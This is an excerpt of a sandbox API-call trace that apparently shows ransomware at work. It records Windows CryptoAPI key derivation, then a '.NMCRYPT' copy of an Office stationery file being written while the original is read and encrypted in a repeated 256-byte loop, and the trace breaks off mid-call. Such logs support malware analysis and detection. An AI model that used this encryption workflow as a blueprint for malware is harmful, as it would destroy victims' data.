CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.218] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0163.218] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.218] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad638) returned 1 [0163.218] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.218] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.218] wcslen (_String="\\\\?\\") returned 0x4 [0163.218] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad1f8) returned 1 [0163.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.219] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=10340) returned 1 [0163.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.219] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.220] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.220] GetLastError () returned 0x0 [0163.220] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.266] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.267] GetLastError () returned 0x0 [0163.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.267] GetLastError () returned 0x0 [0163.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.267] GetLastError () returned 0x0 [0163.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.267] GetLastError () returned 0x0 [0163.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.267] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.267] GetLastError () returned 0x0 [0163.267] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.267] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.268] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.268] GetLastError () returned 0x0 [0163.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.268] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.268] GetLastError () returned 0x0 [0163.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.268] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.268] GetLastError () returned 0x0 [0163.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.268] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.268] GetLastError () returned 0x0 [0163.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.268] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.268] GetLastError () returned 0x0 [0163.268] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.268] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.269] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.269] GetLastError () returned 0x0 [0163.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.269] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.269] GetLastError () returned 0x0 [0163.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.269] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.269] GetLastError () returned 0x0 [0163.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.269] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.269] GetLastError () returned 0x0 [0163.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.269] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.269] GetLastError () returned 0x0 [0163.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.269] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.269] GetLastError () returned 0x0 [0163.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.269] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.270] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.270] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.270] GetLastError () returned 0x0 [0163.270] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.271] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.271] GetLastError () returned 0x0 [0163.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.271] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.271] GetLastError () returned 0x0 [0163.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.271] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.271] GetLastError () returned 0x0 [0163.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.271] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.271] GetLastError () returned 0x0 [0163.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.271] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.271] GetLastError () returned 0x0 [0163.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.271] CryptEncrypt (in: hKey=0x9ad1f8, 